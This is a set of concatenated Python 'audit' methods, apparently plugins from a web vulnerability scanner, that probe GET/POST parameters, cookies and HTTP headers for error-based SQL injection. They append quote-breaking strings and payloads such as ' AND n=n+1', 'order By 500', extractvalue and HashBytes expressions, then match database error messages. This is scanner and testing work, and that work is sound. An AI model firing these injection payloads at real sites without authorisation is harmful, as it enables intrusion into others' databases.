def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc # cookie sql_flag = '鎈\'"\(' if headers and "cookie" in headers: cookies = paramToDict(headers["cookie"], place=PLACE.COOKIE) del headers["cookie"] if cookies: for k, v in cookies.items(): cookie = copy.deepcopy(cookies) cookie[k] = v + sql_flag r = requests.get(url, headers, cookies=urlencode(cookie)) for sql_regex, dbms_type in Get_sql_errors(): match = sql_regex.search(r.text) if match: out.success(url, self.name, payload="cookie: {}={}".format( k, cookie[k]), dbms_type=dbms_type, raw=r.raw) break if method == 'GET': if p.query == '': return exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: return for k, v in params.items(): if k.lower() in ignoreParams: continue data = copy.deepcopy(params) data[k] = v + sql_flag url1 = prepare_url(netloc, params=data) r = requests.get(url1, headers=headers) html = r.text for sql_regex, dbms_type in Get_sql_errors(): match = sql_regex.search(html) if match: out.success(url, self.name, payload="{}={}".format(k, data[k]), dbms_type=dbms_type, raw=r.raw) break
def audit(self): num = random_num(4) s = random_str(4) _payloads = [ '鎈\'"\(', "'", "')", "';", '"', '")', '";', ' order By 500 ', "--", "-0", ") AND {}={} AND ({}={}".format(num, num + 1, num, num), " AND {}={}%23".format(num, num + 1), " %' AND {}={} AND '%'='".format(num, num + 1), " ') AND {}={} AND ('{}'='{}".format(num, num + 1, s, s), " ' AND {}={} AND '{}'='{}".format(num, num + 1, s, s), '`', '`)', '`;', '\\', "%27", "%%2727", "%25%27", "%60", "%5C", "extractvalue(1,concat(char(126),md5({})))".format(random_num), "convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))". format(random_num) ] # 载入处理位置以及原始payload iterdatas = self.generateItemdatas() # 根据原始payload和位置组合新的payload for origin_dict, positon in iterdatas: payloads = self.paramsCombination(origin_dict, positon, _payloads) for key, value, new_value, payload in payloads: r = self.req(positon, payload) if not r: continue html = r.text for sql_regex, dbms_type in Get_sql_errors(): match = sql_regex.search(html) if match: result = self.new_result() result.init_info(self.requests.url, "SQL注入", VulType.SQLI) result.add_detail( "payload探测", r.reqinfo, generateResponse(r), "DBMS_TYPE:{} 匹配结果:{}".format( dbms_type, match.group()), key, payload, positon) self.success(result) return True message_lists = sensitive_page_error_message_check(html) if message_lists: result = self.new_result() result.init_info(self.requests.url, "SQL注入", VulType.SQLI) result.add_detail( "payload探测", r.reqinfo, generateResponse(r), "需要注意的报错信息:{}".format(repr(message_lists)), key, payload, positon) self.success(result) return True
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL data = self.requests.get_body_data().decode() # POST 数据 resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 if method == 'GET': # 从源码中获取更多链接 links = get_links(resp_str, url, True) links.append(url) for link in set(links): # 只接收指定类型的SQL注入 p = urlparse(link) if p.query == '': continue exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: continue params = dict() for i in p.query.split("&"): try: key, value = i.split("=") params[key] = value except ValueError: pass netloc = "{}://{}{}".format(p.scheme, p.netloc, p.path) sql_flag = '鎈\'"\(' for k, v in params.items(): if k.lower() in ignoreParams: continue data = copy.deepcopy(params) data[k] = v + sql_flag url1 = prepare_url(netloc, params=data) if Share.in_url(url1): continue Share.add_url(url1) r = requests.get(url1, headers=headers) html = r.text for sql_regex, dbms_type in Get_sql_errors(): match = sql_regex.search(html) if match: out.success(link, self.name, payload="{}={}".format(k, data[k])) break
def audit(self): _payloads = ['鎈\'"\('] # 载入处理位置以及原始payload iterdatas = self.generateItemdatas() # 根据原始payload和位置组合新的payload for origin_dict, positon in iterdatas: payloads = self.paramsCombination(origin_dict, positon, _payloads) for key, value, new_value, payload in payloads: r = self.req(positon, payload) if not r: continue html = r.text for sql_regex, dbms_type in Get_sql_errors(): match = sql_regex.search(html) if match: result = self.new_result() result.init_info(self.requests.url, "SQL注入", VulType.SQLI) result.add_detail( "payload探测", r.reqinfo, generateResponse(r), "DBMS_TYPE:{} 匹配结果:{}".format( dbms_type, match.group()), key, payload, positon) self.success(result) return True message_lists = sensitive_page_error_message_check(html) if message_lists: result = self.new_result() result.init_info(self.requests.url, "基于报错的SQL注入", VulType.SQLI) result.add_detail( "payload探测", r.reqinfo, generateResponse(r), "需要注意的报错信息:{}".format(repr(message_lists)), key, payload, positon) self.success(result) return True
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL post_hint = self.requests.post_hint post_data = self.requests.post_data resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc if method == 'POST': if post_hint == POST_HINT.NORMAL: sql_flag = '鎈\'"\(' for k, v in post_data.items(): if k.lower() in ignoreParams: continue data = copy.deepcopy(post_data) data[k] = v + sql_flag r = requests.post(url, headers=headers, data=data) html = r.text for sql_regex, dbms_type in Get_sql_errors(): match = sql_regex.search(html) if match: out.success(url, self.name, payload="{}={}".format(k, data[k]), data=str(data), dbms=str(dbms_type), raw=r.raw) break
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc if method == 'GET': if p.query == '': return exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: return sql_flag = '鎈\'"\(' for k, v in params.items(): if k.lower() in ignoreParams: continue data = copy.deepcopy(params) data[k] = v + sql_flag url1 = prepare_url(netloc, params=data) r = requests.get(url1, headers=headers) html = r.text for sql_regex, dbms_type in Get_sql_errors(): match = sql_regex.search(html) if match: out.success(url, self.name, payload="{}={}".format(k, data[k])) break
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc # cookie exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: return origin_len = len(resp_str) sql_flag = '鎈\'"\(' if headers and "cookie" in headers: cookies = paramToDict(headers["cookie"], place=PLACE.COOKIE) tmp_headers = copy.deepcopy(headers) del tmp_headers["cookie"] if cookies: for k, v in cookies.items(): cookie = copy.deepcopy(cookies) cookie[k] = v + sql_flag r = requests.get(url, headers=tmp_headers, cookies=urlencode(cookie)) if origin_len == len(r.text): continue for sql_regex, dbms_type in Get_sql_errors(): match = sql_regex.search(r.text) if match: out.success(url, self.name, payload="cookie: {}={}".format( k, cookie[k]), dbms_type=dbms_type, raw=r.raw) break if method == 'GET': if p.query == '': return exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: return for k, v in params.items(): if k.lower() in ignoreParams: continue data = copy.deepcopy(params) data[k] = v + sql_flag url1 = prepare_url(netloc, params=data) r = requests.get(url1, headers=headers) html = r.text for sql_regex, dbms_type in Get_sql_errors(): match = sql_regex.search(html) if match: out.success(url, self.name, payload="{}={}".format(k, data[k]), dbms_type=dbms_type, raw=r.raw, errinfo=match.group()) break # test header if headers: sql_flag = '\'"\(' new_headers = { "User-Agent": headers.get("User-Agent", "") + sql_flag, "referer": headers.get("referer", url) + sql_flag, "x-forwarded-for": headers.get("x-forwarded-for", "127.0.0.1") + sql_flag, "via": headers.get("via", "") + sql_flag } r = requests.get(url, headers=new_headers) html = r.text if origin_len == len(html): return for sql_regex, dbms_type in Get_sql_errors(): match = sql_regex.search(html) if match: out.success(url, self.name, type="header inject", dbms_type=dbms_type, raw=r.raw, errinfo=match.group()) break